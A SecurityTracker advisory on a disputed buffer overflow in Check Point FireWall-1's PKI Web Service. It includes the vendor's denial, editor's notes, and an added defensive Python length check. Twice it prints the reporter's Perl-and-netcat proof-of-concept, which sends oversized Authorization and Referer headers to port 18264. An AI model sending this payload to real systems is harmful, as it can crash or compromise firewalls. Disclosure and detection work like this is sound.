SecurityTracker.com
Category:   Application (Firewall)  >   FireWall-1/VPN-1
Vendors:   Check Point
[Unconfirmed] Check Point FireWall-1 Buffer Overflow in PKI Web Service Has Unspecified Impact
SecurityTracker Alert ID:  1021948
SecurityTracker URL:  http://securitytracker.com/id/1021948
CVE Reference:   CVE-2009-1227
Updated:  Apr 10 2009
Original Entry Date:  Mar 30 2009
Impact:   Not specified
Exploit Included:  Yes  

Description:   A vulnerability was reported in FireWall-1/VPN-1 in the PKI Web Service. The impact was not specified. [Editor's note: This vulnerability is unconfirmed.]

A remote user can reportedly send a specially crafted 'Authorization' or 'Referer' HTTP header value to the PKI Web Service on TCP port 18264 to trigger a buffer overflow.

A demonstration exploit request (a Perl command) is provided:

perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 .
"\r\nFrom: bugs@hugs.com\r\nIf-Modified-Since: Fri, 13 Dec 2006
09:12:58 GMT\r\nReferer: http://www.owasp.org/" . "x" x 8192 .
"\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc
suckit.com 18264
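
A length check a defender could run over requests captured on this port, as an added example that is not part of the advisory or of Check Point's code. The 1024-byte threshold, the function names and the sample requests are assumptions made for illustration.

```python
# Added example: flag oversized HTTP header values in requests captured on
# the PKI Web Service port. Nothing here is Check Point code.
PKI_PORT = 18264        # port used in the advisory's demonstration request
NAMED = {"authorization", "referer"}  # headers named in the report
MAX_VALUE_LEN = 1024    # assumed threshold, not from the advisory; tune it


def parse_request(raw: bytes):
    """Split raw request bytes into (request_line, [(name, value), ...])."""
    head = raw.partition(b"\r\n\r\n")[0]  # a truncated capture has no terminator
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        if line[:1] in (b" ", b"\t") and headers:
            # Folded continuation line: it extends the previous value, so it
            # must count toward that header's length.
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip().decode("latin-1"))
            continue
        name, sep, value = line.partition(b":")
        if sep:  # skip lines that are not headers
            headers.append((name.strip().decode("latin-1").lower(),
                            value.strip().decode("latin-1")))
    return lines[0].decode("latin-1"), headers


def oversized_headers(raw: bytes, dst_port: int, limit: int = MAX_VALUE_LEN):
    """Return [(name, length, named_in_report)] for values longer than limit."""
    if dst_port != PKI_PORT:
        return []
    _, headers = parse_request(raw)
    return [(n, len(v), n in NAMED) for n, v in headers if len(v) > limit]


# Constructed sample requests (built in memory, never sent anywhere).
BENIGN = (b"GET / HTTP/1.0\r\nAuthorization: Basic dXNlcjpwYXNz\r\n"
          b"Referer: http://example.test/\r\n\r\n")
OVERSIZED = (b"GET / HTTP/1.0\r\nAuthorization: Basic " + b"x" * 8192 +
             b"\r\nReferer: http://example.test/" + b"x" * 8192 + b"\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(label, oversized_headers(req, PKI_PORT))
```

The check reports every header over the limit, not only the two named in the report, because the original message describes the problem as one of very long HTTP headers in general.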

BugsNotHugs reported this vulnerability.

The vendor has provided the following response:

"Check Point Security Alert Team has analyzed this report. We've tried to reproduce the attack on all VPN-1 versions from NG FP2 and above with and without HFAs.

The issue was not reproduced. We have conducted a thorough analysis of the relevant code and verified that we are secure against this attack.

We consider this attack to pose no risk to Check Point customers."

[Editor's note: The original reporter stands by the report and indicates that the behavior was observed during a penetration test two years ago against an unknown version of the product. Note that the NG FP2 product was released in April 2002.]

Impact:   The impact was not specified.
Solution:   [Editor's note: The vendor has tested versions NG FP2 and later and cannot reproduce the reported behavior. The vendor has conducted code analysis on versions NG FP2 and later and indicates that the product is not affected. See the Description section for the vendor's response.]
Vendor URL:  www.checkpoint.com/
Cause:   Boundary error
Underlying OS:  

Message History:   None.


 Source Message Contents

Date:  Mon, 30 Mar 2009 02:16:17 -0600
Subject:  [Full-disclosure] Check Point Firewall-1 PKI Web Service HTTP

- Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow

- Description

The Check Point Firewall-1 PKI Web Service, running by default on TCP
port 18264, is vulnerable to a remote overflow in the handling of very
long HTTP headers. This was discovered during a pen-test where the
client would not allow further analysis and would not provide the full
product/version info. Initial testing indicates the 'Authorization'
and 'Referer' headers were vulnerable.

- Product

Check Point, Firewall-1, unknown

- PoC

perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 .
"\r\nFrom: bugs@hugs.com\r\nIf-Modified-Since: Fri, 13 Dec 2006
09:12:58 GMT\r\nReferer: http://www.owasp.org/" . "x" x 8192 .
"\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc
suckit.com 18264

- Solution

None

- Timeline

2006-11-06: Vulnerability Discovered
2009-03-29: Disclosed to Public

-- 

BugsNotHugs
Shared Vulnerability Disclosure Account

Copyright 2014, SecurityGlobal.net LLC